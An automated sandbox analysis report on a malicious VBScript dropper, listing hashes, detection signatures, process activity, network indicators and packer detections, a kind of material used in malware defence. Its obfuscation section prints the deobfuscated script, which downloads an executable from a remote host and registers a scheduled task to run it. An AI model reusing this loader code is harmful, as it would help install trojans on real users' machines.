Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
graphic.vbs

Overview

General Information

Sample Name:graphic.vbs
Analysis ID:651434
MD5:d2945c4124e2f89c05a723f7c1ad416d
SHA1:414faaa0bf15450bc7f84c31024fa8fed26eb156
SHA256:ac1cad78a2be2e78a05a51cf4d1b5eac2a6b302a40c3f6157496e00b4dcb81cd
Tags:vbs
Infos:

Detection

CryptOne
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

System process connects to network (likely due to code injection or exploit)
Benign windows process drops PE files
VBScript performs obfuscated calls to suspicious functions
Yara detected CryptOne packer
Machine Learning detection for dropped file
Creates a DirectInput object (often for capturing keystrokes)
Antivirus or Machine Learning detection for unpacked file
Java / VBScript file with very long strings (likely obfuscated code)
One or more processes crash
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

  • System is w10x64
  • wscript.exe (PID: 6264 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\graphic.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • LogicoolTouchPad.exe (PID: 6400 cmdline: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exe MD5: 216BBB6CE29EF16A61B9D5BA4D227300)
    • WerFault.exe (PID: 6624 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6400 -s 800 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • LogicoolTouchPad.exe (PID: 6588 cmdline: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exe MD5: 216BBB6CE29EF16A61B9D5BA4D227300)
    • WerFault.exe (PID: 6540 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6588 -s 772 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
0000001B.00000000.500619017.0000000002420000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CryptYara detected CryptOne packerJoe Security
    00000001.00000002.330453145.00000000024F0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CryptYara detected CryptOne packerJoe Security
      0000001B.00000000.503077850.0000000002420000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CryptYara detected CryptOne packerJoe Security
        0000001B.00000002.524676922.0000000002420000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CryptYara detected CryptOne packerJoe Security
          00000001.00000000.283066590.00000000024F0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CryptYara detected CryptOne packerJoe Security
            Click to see the 1 entries
            No Sigma rule has matched
            No Snort rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeJoe Sandbox ML: detected
            Source: 1.0.LogicoolTouchPad.exe.24f0174.3.unpackAvira: Label: TR/Kazy.4159236
            Source: 27.2.LogicoolTouchPad.exe.2420174.2.unpackAvira: Label: TR/Kazy.4159236
            Source: 1.2.LogicoolTouchPad.exe.24f0174.2.unpackAvira: Label: TR/Kazy.4159236
            Source: 27.0.LogicoolTouchPad.exe.2420174.6.unpackAvira: Label: TR/Kazy.4159236
            Source: 27.0.LogicoolTouchPad.exe.2420174.3.unpackAvira: Label: TR/Kazy.4159236
            Source: 1.0.LogicoolTouchPad.exe.24f0174.6.unpackAvira: Label: TR/Kazy.4159236
            Source: unknownHTTPS traffic detected: 104.244.73.88:443 -> 192.168.2.4:49746 version: TLS 1.2

            Networking

            barindex
            Source: C:\Windows\System32\wscript.exeDomain query: idontgetitpodcast.com
            Source: C:\Windows\System32\wscript.exeNetwork Connect: 104.244.73.88 443Jump to behavior
            Source: Joe Sandbox ViewASN Name: PONYNETUS PONYNETUS
            Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: wscript.exe, 00000000.00000002.283084836.000001D4A82F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.269647518.000001D4A82F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: LogicoolTouchPad.exeString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: wscript.exe, 00000000.00000003.271192944.000001D4A9072000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.270558268.000001D4A9072000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.268142727.000001D4A8EFB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.271051829.000001D4A9072000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.268881837.000001D4A8DF1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.270101303.000001D4A9430000.00000004.00000020.00020000.00000000.sdmp, LogicoolTouchPad.exe, 00000001.00000000.282320853.000000000040C000.00000020.00000001.01000000.00000005.sdmp, LogicoolTouchPad.exe, 00000001.00000000.270511918.0000000000401000.00000020.00000001.01000000.00000005.sdmp, LogicoolTouchPad.exe, 0000001B.00000002.524272566.000000000040C000.00000020.00000001.01000000.00000005.sdmp, LogicoolTouchPad.exe, 0000001B.00000000.493624685.0000000000401000.00000020.00000001.01000000.00000005.sdmp, LogicoolTouchPad.exe.0.drString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/Nhttp://www.borland.com/namespaces/Types
            Source: LogicoolTouchPad.exeString found in binary or memory: http://www.borland.com/namespaces/Types
            Source: LogicoolTouchPad.exe, 00000001.00000002.330199560.000000000080A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Types-
            Source: LogicoolTouchPad.exe, 00000001.00000002.330199560.000000000080A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/TypesR
            Source: LogicoolTouchPad.exe, 00000001.00000002.330199560.000000000080A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Typesh
            Source: wscript.exe, 00000000.00000003.270651210.000001D4A83A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.269529203.000001D4A83A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.283174620.000001D4A83A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://idontgetitpodcast.com/
            Source: wscript.exe, 00000000.00000003.268725950.000001D4A8186000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.282907266.000001D4A613C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.282389725.000001D4A7EDA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.283199116.000001D4A83C7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.282419612.000001D4A6145000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.282379061.000001D4A613E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.282126839.000001D4A613C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.269182349.000001D4A83C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.282146623.000001D4A7EEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://idontgetitpodcast.com/contacting/responsible.dae
            Source: wscript.exe, 00000000.00000003.281065138.000001D4A8BFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://idontgetitpodcast.com/contacting/responsible.daem
            Source: unknownDNS traffic detected: queries for: idontgetitpodcast.com
            Source: global trafficHTTP traffic detected: GET /contacting/responsible.dae HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-USUser-Agent: Logicool TouchPadHost: idontgetitpodcast.com
            Source: unknownHTTPS traffic detected: 104.244.73.88:443 -> 192.168.2.4:49746 version: TLS 1.2
            Source: LogicoolTouchPad.exe, 00000001.00000002.330199560.000000000080A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
            Source: graphic.vbsInitial sample: Strings found which are bigger than 50
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6400 -s 800
            Source: LogicoolTouchPad.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeSection loaded: ff.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeSection loaded: ff.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeCode function: 1_2_004A60881_2_004A6088
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeCode function: 1_2_0047C9201_2_0047C920
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeCode function: 1_2_0047EB701_2_0047EB70
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeCode function: 27_2_004A608827_2_004A6088
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeCode function: 27_2_0047C92027_2_0047C920
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeCode function: 27_2_0047EB7027_2_0047EB70
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeCode function: 27_2_0044D14827_2_0044D148
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeCode function: String function: 0040E714 appears 42 times
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeCode function: String function: 0040FA10 appears 37 times
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeCode function: String function: 0040C1B4 appears 58 times
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeCode function: String function: 0040C178 appears 533 times
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\graphic.vbs"
            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exe C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exe
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6400 -s 800
            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exe C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exe
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6588 -s 772
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6588
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6400
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeCode function: 1_2_0041E2A4 FindResourceA,1_2_0041E2A4
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\graphic.vbs"
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2Jump to behavior
            Source: classification engineClassification label: mal76.troj.evad.winVBS@5/7@1/1
            Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected

            Data Obfuscation

            barindex
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: wscript.shell"):set uZbFgT = createobject("scripting.filesystemobject"):uZbFgT.createfolder vkVrl.ExpandEnvironmentStrings("%TEMP%")&"\A09278-2768-DE0743-A6FB64083C2":ztUFi=vkVrl.ExpandEnvironmentStrings("%TEMP%")&"\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exe":IBajJq.Open "GET", "https://idontgetitpodcast.com/contacting/responsible.dae", False:IBajJq.setRequestHeader "User-Agent", "Logicool TouchPad":IBajJq.Send:with vpGyXBL:.type=1:.open:.write IBajJq.responseBody:.savetofile ztUFi,2:end with:Set ATEjv = CreateObject("Schedule.service"):call ATEjv.Connect():Set EMREA = ATEjv.GetFolder("\"):Set gFVDU = ATEjv.NewTask(0):Set OQkDSI = gFVDU.RegistrationInfo:OQkDSI.Description = "Logicool TouchPad":OQkDSI.Author = "Administrotor":Set MeYTW = gFVDU.Settings:MeYTW.Enabled = True:MeYTW.StartWhenAvailable = True:MeYTW.Hidden = False:Set DLBKQzw = gFVDU.Triggers:Set RMaGa = DLBKQzw.Create(1):XE = DateAdd("s", 105, Now):startTime = qjVVXs(XE):XE = DateAdd("n", 11, Now):endTime = qjVVXs(XE):RMaGa.StartBoundary = startTime:RMaGa.EndBoundary = endTime:RMaGa.Id = "LogicoolTouchPad":RMaGa.Enabled = True:Set ltetPO = gFVDU.Actions.Create(0):ltetPO.Path = ztUFi:call EMREA.RegisterTaskDefinition("LogicoolTouchPad", gFVDU, 6, , , 3):function qjVVXs(buFVO):lkSXRK = "0" & Second(buFVO):UjDzC = "0" & Minute(buFVO):RaxnM = "0" & Hour(buFVO):IzBmJgn = "0" & Day(buFVO):cxsfvS = "0" & Month(buFVO):mIDLyU = Year(buFVO):kzuTe = Right(RaxnM, 2)&(chr(58/1+chr(48)))&Right(UjDzC, 2)&(chr(58/1+chr(48)))&Right(lkSXRK, 2):FqOtD = mIDLyU & chr(45) & Right(cxsfvS, 2) & chr(45) & Right(IzBmJgn, 2):qjVVXs = FqOtD & Chr(74+10) & kzuTe:End functio
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeCode function: 1_2_00402076 push 00000057h; retf 1_2_0040207C
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeCode function: 1_2_00403B76 push es; retf 1_2_00403B83
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeCode function: 1_2_00406DC0 push dword ptr [edx]; ret 1_2_00406ECD
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeCode function: 1_2_004046C6 push 00000052h; retf 1_2_004046C8
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeCode function: 1_2_0043FB0C push 0043FB99h; ret 1_2_0043FB91
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeCode function: 1_2_004B805C push 004B8088h; ret 1_2_004B8080
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeCode function: 1_2_0040E068 push 0040E1E4h; ret 1_2_0040E1DC
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeCode function: 1_2_004B8024 push 004B8050h; ret 1_2_004B8048
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeCode function: 1_2_0042C038 push 0042C064h; ret 1_2_0042C05C
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeCode function: 1_2_004C60EC push 004C6149h; ret 1_2_004C6141
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeCode function: 1_2_004B8094 push 004B80C0h; ret 1_2_004B80B8
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeCode function: 1_2_004B4158 push 004B4184h; ret 1_2_004B417C
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeCode function: 1_2_004B216C push 004B23F6h; ret 1_2_004B23EE
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeCode function: 1_2_00466108 push 004661C2h; ret 1_2_004661BA
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeCode function: 1_2_0040E1E6 push 0040E257h; ret 1_2_0040E24F
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeCode function: 1_2_0040E1E8 push 0040E257h; ret 1_2_0040E24F
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeCode function: 1_2_004561E8 push 00456214h; ret 1_2_0045620C
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeCode function: 1_2_0042A24C push 0042A278h; ret 1_2_0042A270
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeCode function: 1_2_004B4234 push 004B4260h; ret 1_2_004B4258
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeCode function: 1_2_004642C4 push 004642F7h; ret 1_2_004642EF
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeCode function: 1_2_0046229C push 004622D4h; ret 1_2_004622CC
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeCode function: 1_2_0042A340 push 0042A36Ch; ret 1_2_0042A364
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeCode function: 1_2_0046430C push 00464338h; ret 1_2_00464330
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeCode function: 1_2_004663A8 push 004663D4h; ret 1_2_004663CC
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeCode function: 1_2_004D0408 push 004D04A8h; ret 1_2_004D04A0
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeCode function: 1_2_004424DC push 00442508h; ret 1_2_00442500
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeCode function: 1_2_004D04F8 push 004D0524h; ret 1_2_004D051C
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeCode function: 1_2_004D04AC push 004D04F3h; ret 1_2_004D04EB
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeCode function: 1_2_0041A510 push ecx; mov dword ptr [esp], edx1_2_0041A515
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeCode function: 1_2_004B4528 push 004B4554h; ret 1_2_004B454C
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeCode function: 1_2_004D0530 push 004D055Ch; ret 1_2_004D0554
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeJump to dropped file
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exe TID: 6388Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: wscript.exe, 00000000.00000003.269279849.000001D4A833B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.283159714.000001D4A838F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.270596564.000001D4A8355000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.270730080.000001D4A8389000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.275727881.000001D4A82DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.283061777.000001D4A82DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: wscript.exe, 00000000.00000003.275727881.000001D4A82DB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.283061777.000001D4A82DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWl<!^
            Source: C:\Users\user\AppData\Local\Temp\A09278-2768-DE0743-A6FB64083C2\LogicoolTouchPad.exeMemory protected: page execute and write copy | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\System32\wscript.exeDomain query: idontgetitpodcast.com
            Source: C:\Windows\System32\wscript.exeNetwork Connect: 104.244.73.88 443Jump to behavior
            Source: C:\Windows\System32\wscript.exeFile created: LogicoolTouchPad.exe.0.drJump to dropped file
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 0000001B.00000000.500619017.0000000002420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.330453145.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000000.503077850.0000000002420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.524676922.0000000002420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000000.283066590.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000000.283863343.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 0000001B.00000000.500619017.0000000002420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.330453145.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000000.503077850.0000000002420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.524676922.0000000002420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000000.283066590.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000000.283863343.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts121
            Scripting
            1
            DLL Side-Loading
            11
            Process Injection
            1
            Virtualization/Sandbox Evasion
            1
            Input Capture
            1
            Security Software Discovery
            Remote Services1
            Input Capture
            Exfiltration Over Other Network Medium11
            Encrypted Channel
            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default Accounts1
